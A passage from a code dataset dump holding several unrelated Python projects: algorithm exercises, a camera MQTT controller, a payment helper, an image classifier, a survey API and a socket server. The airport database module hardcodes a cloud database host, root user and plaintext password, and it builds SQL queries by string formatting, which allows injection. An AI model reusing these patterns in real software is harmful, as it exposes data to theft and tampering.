:\r\n你的算法只能使用常数的额外空间。\r\n你不能只是单纯的改变节点内部的值,而是需要实际的进行节点交换。\r\n\r\nexample:\r\n给定这个链表:1->2->3->4->5\r\n当 k = 2 时,应当返回: 2->1->4->3->5\r\n当 k = 3 时,应当返回: 3->2->1->4->5\r\n\"\"\"\r\n\r\n\r\nclass ListNode:\r\n\r\n def __init__(self, x):\r\n self.val = x\r\n self.next = None\r\n\r\n\r\ndef create_link_list(list_number):\r\n link_list = ListNode(0)\r\n now_node = link_list\r\n for temp in list_number:\r\n new_node = ListNode(temp)\r\n now_node.next = new_node\r\n now_node = new_node\r\n return link_list.next\r\n\r\n\r\nclass Solution:\r\n def reverse_k_group(self, head, k):\r\n \"\"\"\r\n :param head: ListNode\r\n :param k: int\r\n :return: ListNode\r\n \"\"\"\r\n # 尝试使用快慢指针, 慢指针指向待交换的起始节点的前一个节点,快指针指向待交换的节点的最后一个节点\r\n if k == 1 or head is None:\r\n return head\r\n mark_node = ListNode(0)\r\n mark_node.next = head\r\n slow = head\r\n fast = head.next\r\n start = mark_node\r\n while fast is not None:\r\n k_count = 1\r\n while k_count < k and fast is not None:\r\n fast = fast.next\r\n k_count += 1\r\n if k_count == k:\r\n while slow.next != fast:\r\n temp_node = slow.next\r\n slow.next = temp_node.next\r\n temp_node.next = start.next\r\n start.next = temp_node\r\n start = slow\r\n slow = slow.next\r\n if fast is not None:\r\n fast = fast.next\r\n return mark_node.next\r\n\r\n\r\nif __name__ == \"__main__\":\r\n test_list = [1, 2, 3, 4, 5, 6, 7, 8, 9]\r\n list_node = create_link_list(test_list)\r\n\r\n solute = Solution()\r\n result = solute.reverse_k_group(list_node, 9)\r\n temp = result\r\n while temp is not None:\r\n print(temp.val)\r\n temp = temp.next\r\n","repo_name":"ningmengpian/algorithm","sub_path":"reverse_k_group.py","file_name":"reverse_k_group.py","file_ext":"py","file_size_in_byte":2340,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70603130029","text":"from flask import Flask, request\nfrom flask_restx import Resource, Api, reqparse\n\napp = Flask(__name__)\napi = Api(app)\n\nparser = reqparse.RequestParser()\nparser.add_argument('count', required=True, type=int, help=\"요청할 댓글 개수입니다.\")\n\n@api.route('/comment')\nclass Comments(Resource):\n\n @api.expect(parser)\n def get(self):\n args = parser.parse_args()\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=\"5001\", debug=True)","repo_name":"alsruf36/political-disposition-determiner","sub_path":"news_crawler/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"16864829548","text":"from typing import List\nfrom CreateTree import TreeNode\n\n\nclass Solution:\n def buildTree(self, preorder: List[int], inorder: List[int]) -> TreeNode:\n def helper(preorder_left, preorder_right, inorder_left, inorder_right):\n \"\"\"\n 4个参数分别是前序列表的区间指针和中序列表的区间指针\n \"\"\"\n # base case\n if preorder_left > preorder_right:\n return None\n\n # 前序列表: [根, 左子树, 右子树]\n # 中序列表: [左子树, 根, 右子树]\n\n # 前序列表的第一个元素为根节点值\n root_val = preorder[preorder_left]\n # 取得根节点在��序列表的索引\n root_idx = inorder.index(root_val)\n\n # 左子树节点数量\n size_left_subtree = root_idx - inorder_left\n\n # 左子树4个参数\n l_preorder_left = preorder_left + 1\n l_preorder_right = preorder_left + size_left_subtree\n l_inorder_left = inorder_left\n l_inorder_right = root_idx - 1\n\n # 右子树4个参数\n r_preorder_left = preorder_left + size_left_subtree + 1\n r_preorder_right = preorder_right\n r_inorder_left = root_idx + 1\n r_inorder_right = inorder_right\n\n # 构造当前根节点, 递归构造左右子树\n node = TreeNode(root_val)\n node.left = helper(l_preorder_left, l_preorder_right, l_inorder_left, l_inorder_right)\n node.right = helper(r_preorder_left, r_preorder_right, r_inorder_left, r_inorder_right)\n\n return node\n\n return helper(0, len(preorder) - 1, 0, len(inorder) - 1)","repo_name":"tangxyw/LeetCode","sub_path":"python/BinaryTree/[105][剑指offer07]从前序与中序遍历序列构造二叉树.py","file_name":"[105][剑指offer07]从前序与中序遍历序列构造二叉树.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"70270689708","text":"import matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\n# Run only if all the txt files are created with the same K\r\n\r\nk = pd.read_csv('PS_k.txt',header=None)\r\nWE = pd.read_csv('PS_WE.txt',header=None)\r\nKG = pd.read_csv('PS_KG.txt',header=None)\r\nsineG = pd.read_csv('PS_SG.txt',header=None)\r\nV4 = pd.read_csv('PS_V4.txt',header=None)\r\nuux = pd.read_csv('PS_uux.txt',header=None)\r\nuux2 = pd.read_csv('PS_uux2.txt',header=None)\r\nu2ux2 = pd.read_csv('PS_u2ux2.txt',header=None)\r\n\r\n\r\nplt.plot(WE,'k:',label=\"Wave Eq\")\r\nplt.plot(KG,'--',label='KG Eq')\r\nplt.plot(sineG,'--',label='sineG Eq')\r\nplt.plot(V4,'--',label='$V=\\lambda u^4$')\r\nplt.plot(uux,'--',label=r'$u\\nabla u$')\r\nplt.plot(uux2,'--',label=r'$u(\\nabla u)^2$')\r\nplt.plot(u2ux2,'--',label=r'$u^2(\\nabla u)^2$')\r\nplt.xlabel(r\"$k$\")\r\nplt.ylabel(r\"$|a_k|$\")\r\nplt.legend(loc='center left',bbox_to_anchor=(1, 0.5))\r\nplt.yscale('log')\r\nplt.tick_params(axis='both',direction='in',width=1,length=6)\r\nplt.show()\r\n\r\n","repo_name":"miquel25/TFG2022","sub_path":"2D Simulation/2D-PS_plot.py","file_name":"2D-PS_plot.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5656180430","text":"#!/usr/bin/python3\n# process trigger command passed over MQTT\n# 8/25/18\n# updated 6/9/19\n\nimport os\nimport logging\nimport subprocess\nfrom time import sleep\nfrom datetime import datetime\nfrom picamera import PiCamera\nfrom fractions import Fraction\nimport paho.mqtt.client as mqtt\nfrom keys import img_bucket\n\n\nclass SteadyCam:\n\n def __init__(self, basepath, hostname):\n self.logger = self._init_logger()\n self.hostname = hostname\n self.basepath = basepath\n self.remote_bucket = os.path.join(img_bucket, self.hostname)\n self.pic_path = os.path.join(self.basepath, 'imgs')\n self._del_old_pics()\n self.cam = self._init_camera()\n\n def _init_logger(self):\n logger = logging.getLogger('steady_cam')\n logger.info('mqtt_cam logger instantiated')\n return logger\n\n def _init_camera(self, resolution=(3280, 2464), shutter_speed=16670, awb_gains=(Fraction(13, 8), Fraction(439, 256))):\n '''\n shutter_speed is set to 16670 to synchronize with the 60hz refresh rate\n of US electricity. this avoids banding in the images.\n the default awb_gains value was queried from a picamera instance exposed\n to 2 daylight balanced bulbs in a studio setting.\n\n more info:\n https://picamera.readthedocs.io/en/release-1.13/recipes1.html#capturing-consistent-images\n https://picamera.readthedocs.io/en/release-1.13/fov.html#sensor-gain\n '''\n cam = PiCamera(resolution=resolution)\n cam.iso = 60\n cam.shutter_speed = 16670 # sync shutter speed with 60hz refresh rate of US electricity to avoid banding\n self.logger.info('warming up camera and setting values...')\n sleep(2)\n cam.exposure_mode = 'off' # fix the analog and digital gains, which are not directly settable\n cam.awb_mode = 'off'\n cam.awb_gains = awb_gains\n self.logger.info('camera ready')\n\n return cam\n\n def _copy_pic(self, pic_path):\n '''use scp to copy a single image to a remote host'''\n img = pic_path.split('/')[-1]\n status = subprocess.call(['scp', '-p', pic_path, self.remote_bucket], stdout=subprocess.DEVNULL)\n\n if status == 0:\n self.logger.info('copied {} to remote host'.format(img))\n else:\n self.logger.error('there was a problem copying {} to remote host'.format(img))\n\n return status\n\n def _sync_pics(self):\n '''\n use rsync to transfer files to a remote host.\n\n unlike subprocess.call (used in _copy_pic()) which blocks until process\n completes, subprocess.Popen returns immediately\n '''\n self.logger.info('syncing pic to remote machine via rsync')\n return subprocess.Popen(['rsync', '-a', self.pic_path, '--exclude=.gitignore', self.remote_bucket])\n\n def _del_old_pics(self):\n '''\n if there are pics or in imgs/, ask if we want to delete them.\n exit if we say no.\n '''\n pics = [pic.path for pic in os.scandir(self.pic_path) if pic.path.endswith('.jpg') or pic.path.endswith('.h264')]\n\n if not pics:\n self.logger.info('imgs/ directory is clean, no pics to delete')\n else:\n self.logger.error('there are files in the imgs/ directory')\n proceed = input('delete the pics now? (y/n): ')\n if proceed.lower() != 'y' and proceed.lower() != 'yes':\n raise SystemExit('exiting to avoid deleting possibly unsaved pics')\n else:\n self.logger.info('deleting straggler pics')\n for pic in pics:\n self.delete_pic(pic)\n\n def snap_pic(self):\n self.logger.info('snapping a pic')\n now = datetime.now()\n pic = os.path.join(self.pic_path, '{}_{}.jpg'.format(self.hostname, now.strftime(\"%Y-%m-%d_%H-%M-%S\")))\n self.cam.capture(pic)\n self.logger.info('snapped a pic')\n\n return pic\n\n def record_video(self, duration=60):\n self.logger.info('recording video for {} seconds'.format(duration))\n self.cam.resolution = (1920, 1080)\n now = datetime.now()\n vid = os.path.join(self.pic_path, '{}_{}.h264'.format(self.hostname, now.strftime(\"%Y-%m-%d_%H-%M-%S\")))\n self.cam.start_recording(vid)\n self.cam.wait_recording(duration)\n self.cam.stop_recording()\n\n def transfer_pics(self, pic_path, method='rsync'):\n '''\n _sync_pics() will attempt to synchronize the entire folder with rsync,\n while _copy_pics() must be passed a path to a single pic which it will\n then try to copy over the network via ssh.\n '''\n return self._sync_pics() if method == 'rsync' else self._copy_pic(pic_path)\n\n def delete_pic(self, pic_path):\n self.logger.info(\"deleting pic: {}\".format(pic_path.split('/')[-1]))\n os.remove(pic_path)\n\n def close(self):\n '''no one wants a leaky memory'''\n self.logger.info('shutting down camera')\n self.cam.close()\n\n\nclass MQTTShutter(mqtt.Client):\n\n def __init__(self, basepath, hostname, broker='mqtt-broker.local', port=1883, topic='', qos=0, keepalive=60, *args, **kwargs):\n self.logger = self._init_logger()\n self.broker = broker\n self.port = port\n self.topic = topic\n self.qos = qos\n self.keepalive = keepalive\n mqtt.Client.__init__(self, *args, **kwargs)\n self.steadycam = SteadyCam(basepath, hostname)\n self.last_pic = ''\n\n def _init_logger(self):\n logger = logging.getLogger('mqtt_shutter')\n logger.info('mqtt_shutter logger instantiated')\n return logger\n\n def _decode_msg(self, msg):\n '''set logger level to DEBUG to log all received messages'''\n payload = msg.payload.decode()\n self.logger.debug('message received')\n self.logger.debug('topic: {} QOS: {} payload: {}'.format(msg.topic, str(msg.qos), payload))\n return payload\n\n def _trigger_pic(self):\n # delete last file generated\n if self.last_pic:\n self.steadycam.delete_pic(self.last_pic)\n\n self.last_pic = self.steadycam.snap_pic()\n self.steadycam.transfer_pics(self.last_pic)\n\n def _trigger_video(self):\n # delete last file generated\n if self.last_pic:\n self.steadycam.delete_pic(self.last_pic)\n\n self.last_pic = self.steadycam.record_video()\n self.steadycam.transfer_pics(self.last_pic)\n\n def on_message(self, mqttc, obj, msg):\n '''\n message received callback\n call the method associated with the message payload\n '''\n msg_methods = {\n '1': self._trigger_pic,\n '2': self._trigger_video\n }\n payload = self._decode_msg(msg)\n\n if msg.topic == 'shutter':\n try:\n self.logger.info('received command {}'.format(payload))\n msg_methods[payload]()\n except KeyError:\n logger.error('received unrecognizable command: {}'.format(payload))\n\n def run(self):\n self.connect(self.broker, self.port, self.keepalive)\n self.subscribe(self.topic, self.qos)\n self.logger.info('connected to MQTT broker {}'.format(self.broker))\n self.logger.info('subscribed to topic \"{}\"'.format(self.topic))\n\n response_code = 0\n while response_code == 0:\n response_code = self.loop()\n return response_code\n","repo_name":"barlaensdoonn/photogrammetric-timelapse","sub_path":"mqtt_shutter.py","file_name":"mqtt_shutter.py","file_ext":"py","file_size_in_byte":7461,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"7015190014","text":"import mysql.connector\r\n\r\nmydb = mysql.connector.connect(\r\n host=\"airport1.chf5rsalfcvg.ap-southeast-2.rds.amazonaws.com\",\r\n user=\"root\",\r\n password=\"Alexa&katie-220306\",\r\n database=\"airport1\"\r\n)\r\nc = mydb.cursor(buffered=True)\r\n\r\n\r\n#def create_table():\r\n # c.execute('CREATE TABLE IF NOT EXISTS TRAIN(Train_No TEXT, Name TEXT, Train_Type TEXT, Source TEXT, Destination TEXT, Availability TEXT)')\r\n\r\n\r\ndef add_data(airlines_id, airlines_at_id, r_id, airlines_name, airlines_from, airlines_to, airlines_total_distance, airlines_travel_time, airlines_departure, airlines_arrival,fare):\r\n c.execute('INSERT INTO airlines(airlines_id, airlines_at_id, r_id, airlines_name, airlines_from, airlines_to, airlines_total_distance, airlines_travel_time, airlines_departure, airlines_arrival,fare) VALUES (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)',\r\n (airlines_id, airlines_at_id, r_id, airlines_name, airlines_from, airlines_to, airlines_total_distance, airlines_travel_time, airlines_departure, airlines_arrival,fare))\r\n mydb.commit()\r\n\r\n\r\ndef view_all_data():\r\n c.execute('SELECT * FROM airlines')\r\n data = c.fetchall()\r\n return data\r\n\r\n\r\ndef view_only_flight_number():\r\n c.execute('SELECT airlines_id FROM airlines')\r\n data = c.fetchall()\r\n return data\r\n\r\ndef get_flight(id):\r\n c.execute(\"SELECT * FROM airlines WHERE airlines_id='{}'\".format(id))\r\n data = c.fetchall()\r\n return data\r\n\r\ndef edit_dealer_data(new_airlines_id, new_airlines_at_id, new_r_id, new_airlines_name, new_airlines_from, new_airlines_to, new_airlines_total_distance, new_airlines_travel_time, new_airlines_departure, new_airlines_arrival,new_fare,\r\n airlines_id, airlines_at_id, r_id, airlines_name, airlines_from, airlines_to, airlines_total_distance, airlines_travel_time, airlines_departure, airlines_arrival,fare):\r\n c.execute(\"UPDATE airlines SET airlines_id=%s, airlines_at_id=%s, r_id=%s, airlines_name=%s, airlines_from=%s, airlines_to=%s, airlines_total_distance=%s, airlines_travel_time=%s, airlines_departure=%s, airlines_arrival=%s, fare=%s WHERE airlines_id=%s AND airlines_at_id=%s AND r_id=%s AND airlines_name=%s AND airlines_from=%s AND airlines_to=%s AND airlines_total_distance=%s AND airlines_travel_time=%s AND airlines_departure=%s AND airlines_arrival=%s AND fare=%s\",\r\n (new_airlines_id, new_airlines_at_id, new_r_id, new_airlines_name, new_airlines_from, new_airlines_to, new_airlines_total_distance, new_airlines_travel_time, new_airlines_departure, new_airlines_arrival,new_fare,\r\n airlines_id, airlines_at_id, r_id, airlines_name, airlines_from, airlines_to, airlines_total_distance, airlines_travel_time, airlines_departure, airlines_arrival,fare))\r\n mydb.commit()\r\n c.execute(\"SELECT airlines_id FROM airlines\")\r\n data = c.fetchall()\r\n return data\r\n\r\n\r\ndef delete_data(airlines_id):\r\n c.execute('DELETE FROM airlines WHERE airlines_id=\"{}\"'.format(airlines_id))\r\n mydb.commit()\r\n\r\ndef execute_query(q):\r\n c.execute(q)\r\n data = c.fetchall()\r\n return data\r\n","repo_name":"punarva10/Airport-Management-System-Using-AWS","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":3108,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"16437092490","text":"import runpy\nimport asyncio\nfrom ansible_rulebook.collection import (\n find_collection,\n find_playbook,\n find_source,\n has_playbook,\n has_rulebook,\n load_rulebook,\n split_collection_name,\n)\n\nclass MockQueue:\n async def put_nowait(self: \"MockQueue\", event: dict) -> None:\n print(event) # noqa: T201\n async def put(self: \"MockQueue\", event: dict) -> None:\n print(event) # noqa: T201\n\nsource = find_source(\"ansible.eda\", \"generic\")\nmodule = runpy.run_path(source)\nentrypoint = module[\"main\"]\nasyncio.run(\n entrypoint(\n MockQueue(),\n {\n \"randomize\": True,\n \"startup_delay\": 1,\n \"create_index\": \"my_index\",\n \"loop_count\": 2,\n \"repeat_count\": 2,\n \"repeat_delay\": 1,\n \"event_delay\": 2,\n \"loop_delay\": 3,\n \"shutdown_after\": 11,\n \"timestamp\": True,\n \"display\": True,\n \"payload\": [{\"i\": 1}, {\"f\": 3.14159}, {\"b\": False}],\n },\n ),\n)\n","repo_name":"tarilabs/demo20230801-invokeeda","sub_path":"manual.py","file_name":"manual.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16809687236","text":"from PIL import Image\nimport torch\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport torchvision\nfrom torchvision import transforms\nfrom torch.utils.data import Dataset, DataLoader\nimport multiprocessing as mp\nimport os\nimport torch.nn as nn\nimport torch.backends.cudnn as cudnn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom net import Net\nfrom torchvision.utils import save_image\nimport shutil\nimport natsort\nfrom torchvision import models\n#from torchsummary import summary\nfrom torchvision import datasets, models, transforms\n\npath = './test/'#구분할 이미지 파일 폴더 경로 입력(input) #S:/bri/\noutput_path = './class/'#구분한 이미지파일 저장할 경로 입력(output)\n\ntext = open('./recogo.txt', 'w', encoding='UTF8' )\n\n\n#클래스 분류\ndef find_classes(dir):\n classes = os.listdir(dir)\n classes.sort()\n class_to_idx = {classes[i]: i for i in range(len(classes))}\n return classes, class_to_idx\n\n\ntransform = transforms.Compose([\n transforms.Resize((224, 224)),\n transforms.ToTensor(),\n transforms.Normalize([0.5, 0.5, 0.5], [0.5, 0.5, 0.5])\n ])\n\n#===================================================================#\n\npath_list = os.listdir(path)\npath_list = natsort.natsorted(path_list)\n\nlistlist =[]\ncopylist = []\nfile_name =[]\nac = listlist.append #이미지 경로\ncopy = copylist.append\nfileappend = file_name.append #이미지 이름\n\nname = './class/'\n\nfor i in path_list: # 왕 이름\n pathA = path + str(i) +'/'\n pathA_Copy = name + str(i) +'/'\n\n pathA_list = os.listdir(pathA)\n pathA_list = natsort.natsorted(pathA_list)\n for j in pathA_list: # 권 수\n pathB = pathA + str(j) +'/'\n pathB_C = pathA_Copy + str(j) +'/'\n\n pathB_list = os.listdir(pathB)\n pathB_list = natsort.natsorted(pathB_list)\n for k in pathB_list: # 장 수\n pathB_l = str(pathB)+str(k)\n pathB_l_C = str(pathB_C)+str(k)\n pathC_list = os.listdir(pathB_l)\n pathC_list = natsort.natsorted(pathC_list)\n for l in pathC_list:\n pathC_l = pathB_l+'/'+str(l) # 경로 + 이미지 파일 이름\n pathC_l_C = pathB_l_C\n ac(str(pathC_l)) #경로 저장\n copy(str(pathC_l_C))\n fileappend(l) #이름만 저장\n\n\nfiles = []\n\n# r=root, d=directories, f = files \nfor r, d, f in os.walk(path):\n for file in f:\n if '.jpg' in file:\n files.append(os.path.join(r, file))\ndir2 = './img/train/'\nclass_name, class_to_idx = find_classes(dir2)\n\nfor target_class in sorted(class_to_idx.keys()):\n class_index = class_to_idx[target_class]\n\nfor f in files:\n img = Image.open(f).convert(\"RGB\") # Load image as PIL.Image\n x = transform(img) # Preprocess image\n x = x.unsqueeze(0) # Add batch dimension\n model = torchvision.models.resnet152(num_classes = 186) # 모델 \n model.load_state_dict(torch.load('cifar_ResNet1818.pth'))\n model.eval()\n output = model(x) # Forward pass\n pred = torch.argmax(output, 1) # Get predicted class if multi-class classification\n \n if not os.path.exists(output_path):\n os.makedirs(output_path)\n\n \n for i in range(0,len(class_name)):\n if pred == i:\n if not os.path.exists(output_path+'/'+str(class_name[i])):\n os.mkdir(output_path+'/'+str(class_name[i]))\n shutil.copy( f ,output_path+'/'+str(class_name[i]))\n print(\"predicted as \" +str(class_name[i]))\n text.write(str(class_name[i]))\n\n\n\n","repo_name":"21toanyone-pro/Historical_Chinese_Characters_Classifier","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73549841707","text":"from fastapi import FastAPI, Depends\nimport uvicorn\nimport json\nfrom pydantic import BaseModel, TypeAdapter\nfrom enum import Enum\nfrom typing import List\nfrom models import Answer as DBAnswer\nfrom auth import JWTBearer\nfrom typing import Annotated\nfrom fastapi.middleware.cors import CORSMiddleware\n\nclass CategoryEnum(str, Enum):\n wellBeing = 'wellBeing'\n physicalActivity = 'physicalActivity'\n workAndStudying = 'workAndStudying'\n relationships = 'relationships'\n socialConnections = 'socialConnections'\n stress = 'stress'\n\napp = FastAPI()\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\nclass Answer(BaseModel):\n option: str\n impact_on: str\n impact: int\n\nclass Question(BaseModel):\n category: CategoryEnum\n question: str\n answers: List[Answer]\n\nQUESTIONS = []\nwith open(\"questions.json\", 'r', encoding='utf-8') as json_file:\n users = json.load(json_file)\n ta = TypeAdapter(List[Question])\n QUESTIONS = ta.validate_python(users)\n\n@app.get(path=\"/get_questions\")\ndef get_questions():\n return QUESTIONS\n\nclass UsersAnswer(BaseModel):\n category: str\n question: str\n impact_on: CategoryEnum\n impact: int\n\nclass UsrAns(BaseModel):\n user: str\n answers: List[UsersAnswer]\n\nclass User(BaseModel):\n name: str\n\n@app.post(path=\"/apply_answers\")\ndef apply_answers(uanswers: UsrAns, user: Annotated[User, Depends(JWTBearer())],):\n myd = {key: 0 for key in CategoryEnum}\n ansl = {key: 0 for key in CategoryEnum}\n answers = uanswers.answers\n for answer in answers:\n myd[answer.impact_on] += answer.impact\n ansl[answer.impact_on] += 1\n for key in myd.keys():\n if ansl[key] == 0:\n myd[key] = 0\n else:\n myd[key] /= ansl[key]\n if ansl[key] < 3:\n myd[key] = 0\n\n DBAnswer.create(\n user=user.name,\n well_being=myd[CategoryEnum.wellBeing],\n physical_activity=myd[CategoryEnum.physicalActivity],\n stress=myd[CategoryEnum.stress],\n social_connections=myd[CategoryEnum.socialConnections],\n work_and_studying=myd[CategoryEnum.workAndStudying],\n )\n return myd\n\n\n@app.get(path=\"/get_statistics\")\ndef get_statistics(user: str):\n data = []\n records = DBAnswer.select().where(user==user)\n for record in records:\n data.append({\"well_being\": record.well_being,\n \"physical_activity\": record.physical_activity,\n \"stress\": record.stress,\n \"social_connections\": record.social_connections,\n \"work_and_studying\": record.work_and_studying,\n \"month\": record.date.month,\n \"day\": record.date.day,\n \"weekday\": record.date.weekday()})\n return data\n\n\nif __name__ == \"__main__\":\n uvicorn.run(\"main:app\", host=\"127.0.0.1\", port=8000, reload=True)","repo_name":"Igor4er/codeforpeace","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73206744428","text":"import requests\nfrom django.conf import settings\n\ndef get_token():\n access_data = {\n 'imp_key':settings.IAMPORT_KEY,\n 'imp_secret':settings.IAMPORT_SECRET\n }\n url = \"https://api.iamport.kr/users/getToken\"\n req = requests.post(url, data=access_data)\n access_res = req.json()\n\n if access_res['code'] is 0:\n return access_res['response']['access_token']\n else:\n return None\n\ndef payments_prepare(order_id, amount, *args, **kwargs):\n access_token = get_token()\n if access_token:\n access_data = {\n 'merchant_uid':order_id,\n 'amount':amount\n }\n url = \"https://api.iamport.kr/payments/prepare\"\n headers = {\n 'Authorization':access_token\n }\n req = requests.post(url, data=access_data, headers=headers)\n res = req.json()\n if res['code'] != 0:\n raise ValueError(\"API 통신 오류\")\n else:\n raise ValueError(\"토큰 오류\")\n\n\n\ndef find_transaction(order_id, *args, **kwargs):\n access_token = get_token()\n if access_token:\n url = \"https://api.iamport.kr/payments/find/\"+order_id\n headers = {\n 'Authorization':access_token\n }\n req = requests.post(url, headers=headers)\n res = req.json()\n if res['code'] == 0:\n context = {\n 'imp_id':res['response']['imp_uid'],\n 'merchant_order_id':res['response']['merchant_uid'],\n 'amount':res['response']['amount'],\n 'status':res['response']['status'],\n 'type':res['response']['pay_method'],\n 'receipt_url':res['response']['receipt_url']\n }\n return context\n else:\n return None\n else:\n raise ValueError(\"토큰 오류\")","repo_name":"Baepeu/python_web_programming_django3","sub_path":"06_onlineshop/order/iamport.py","file_name":"iamport.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"6703550755","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Sep 13 11:35:57 2021\n\n@author: Qui\n\"\"\"\n\n#import multiprocessing\nimport threading\nfrom Pycom.pycomparse import PycomParse\nimport socket\nimport atexit\nimport time\nimport sys\n#import asyncio\n\nclass Pycom(object):\n \n def __init__(self, name, dtbot, sock=None, alivetime=None, mode='server', chunklen=512):\n \n self.name = name\n self.pycomparse = PycomParse('a', self)\n self.chunklen = chunklen\n self.alivetime = alivetime\n self.dtbot = dtbot\n self.hostip = 'localhost'\n self.port = 4432\n \n self.state = ''\n self.new_state = 'connecting'\n self.prev_state = ''\n \n self.verbose = True\n self.prev_frametime = 0.0\n self.serve_thread = False\n self.clientsocket = False\n self.keyboard_kill = False\n self.sending_data = False\n self.rc_file_size = 0\n if alivetime is None:\n self.alivetime = 9999999\n if sock is None:\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n \n else:\n self.sock = sock \n atexit.register(self.exit_handler)\n self.vprint('Initializing Pycoms')\n #self.process_loop()\n #self.server_proc = multiprocessing.Process(target=self.process_loop)\n self.server_proc = threading.Thread(target=self.process_loop)\n #asyncio.ensure_future(self.process_loop(), loop=self.dtbot.bot.loop)\n self.server_proc.start()\n #asyncio.create_task(self.process_loop)\n print('Pycom initialized')\n \n def _init_connecting(self):\n if not self.serve_thread:\n self.sock.bind((self.hostip, self.port))\n self.sock.listen(1)\n #self.serve_thread = multiprocessing.Process(target=self.server_listen)\n # self.serve_thread.start() \n self.new_state = 'listen'\n \n def _listen(self, *args):\n try:\n (self.clientsocket, address) = self.sock.accept()\n self.conactive = True\n self.new_state = 'connected'\n self.vprint('Client connected')\n\n except RuntimeError as e:\n print(e)\n self.new_state = 'listen'\n except KeyboardInterrupt as e:\n self.keykill()\n def set_len(self, newlen):\n if self.chunklen != newlen:\n self.chunklen = newlen\n def keykill(self):\n self.keyboard_kill = True\n self.vprint('Process loop terminated via key command')\n self.exit_handler()\n sys.exit()\n def _init_connected(self):\n print('Client Connected.')\n def _connected(self):\n try:\n self.receive()\n if not self.conactive:\n self.state = 'listen'\n self.vprint('Client has disconnected.')\n except KeyboardInterrupt as e:\n self.keykill()\n\n def _init_receive_file(self):\n try:\n fdata = self.receive_data()\n if not self.conactive:\n self.state = 'listen'\n self.vprint('Client has disconnected.')\n except KeyboardInterrupt as e:\n self.keykill()\n \n\n def receive_data(self):\n try:\n count = 0\n while True:\n output = self.get_socket_output(self.rc_file_size)\n count += len(output)\n print('Receieved ' + str(len(output)))\n if count >= self.rc_file_size:\n break\n \n return output\n \n \n #output = self.pycomparse.clean_received(output)\n #print('\\n' + str(output) + '\\n')\n except WindowsError as e:\n print(e)\n self.new_state = 'listen'\n \n def process_loop(self):\n while True:\n try:\n ctime = time.time()\n delta = time.time() - self.prev_frametime\n self.prev_frametime = ctime\n statemeth = '_' + self.state\n self.check_and_call(self, statemeth)\n self.change_state()\n except KeyboardInterrupt as e:\n self.keykill()\n \n if self.keyboard_kill:\n self.new_state = 'Terminated'\n break\n \n def send_toclient(self, msg):\n if not self.clientsocket:\n if self.state != 'connected':\n self.pycomparse.pycom_cmd(msg)\n return\n # if self.\n # self.sending_data = True\n stime = time.time()\n totalsent = 0\n mlen = len(msg)\n while True:\n if mlen < self.chunklen:\n msg += ';'\n mlen += 1\n else:\n break\n bmsg = msg.encode('utf-8')\n MSGLEN = len(bmsg)\n #print('Sending message: ' + msg)\n #while MSGLEN < self.chunklen:\n # msg = str(bmsg.decode('utf-8'))\n # msg += ';'\n # bmsg = msg.encode('utf-8')\n #MSGLEN = len(bmsg)\n while totalsent < MSGLEN:\n sent = self.clientsocket.send(bmsg[totalsent:])\n if sent == 0:\n self.new_state = 'Terminated'\n raise RuntimeError(\"socket connection broken\")\n \n totalsent = totalsent + sent\n\n total_time = time.time() - stime\n print(\"Send time: \" + str(total_time))\n #self.sending_data = False\n def receive(self):\n try:\n output = self.get_socket_output()\n output = self.pycomparse.clean_received(output)\n #print('\\n' + str(output) + '\\n')\n except WindowsError as e:\n print(e)\n self.new_state = 'listen'\n\n def get_socket_output(self, rcf_size=0):\n chunks = []\n bytes_recd = 0\n chunklen = self.chunklen\n #if rcf_size:\n # chunklen = int(rcf_size)\n while bytes_recd < chunklen:\n chunk = self.clientsocket.recv(min(chunklen - bytes_recd, chunklen))\n if chunk == b'':\n raise RuntimeError(\"socket connection broken\")\n chunks.append(chunk)\n bytes_recd = bytes_recd + len(chunk)\n inp = b''.join(chunks)\n output = inp.decode('utf-8')\n\n return output\n\n def check_and_call(self, obj, statemeth, args=[]):\n if hasattr(obj.__class__, statemeth):\n statefunc = getattr(obj.__class__, statemeth)\n if callable(statefunc):\n if '_init_' in statemeth or '_end_' in statemeth:\n premes = ':CheckCalls:\\tCalling:\\t'\n if '_end_' in statemeth:\n premes += '_end_: State:\\t'\n else:\n premes += '_init_: State:\\t'\n premes += self.state\n self.vprint(premes)\n if len(args):\n statefunc(obj, args)\n else:\n statefunc(obj)\n #time.sleep(0.5)\n \n def change_state(self):\n if self.new_state == '':\n return\n ns = self.new_state\n self.new_state = ''\n if ns != self.state:\n self.vprint(':Change_state:\\tChanging state to:\\t ' + ns)\n end_func = '_end_' + self.state\n self.check_and_call(self, end_func)\n \n 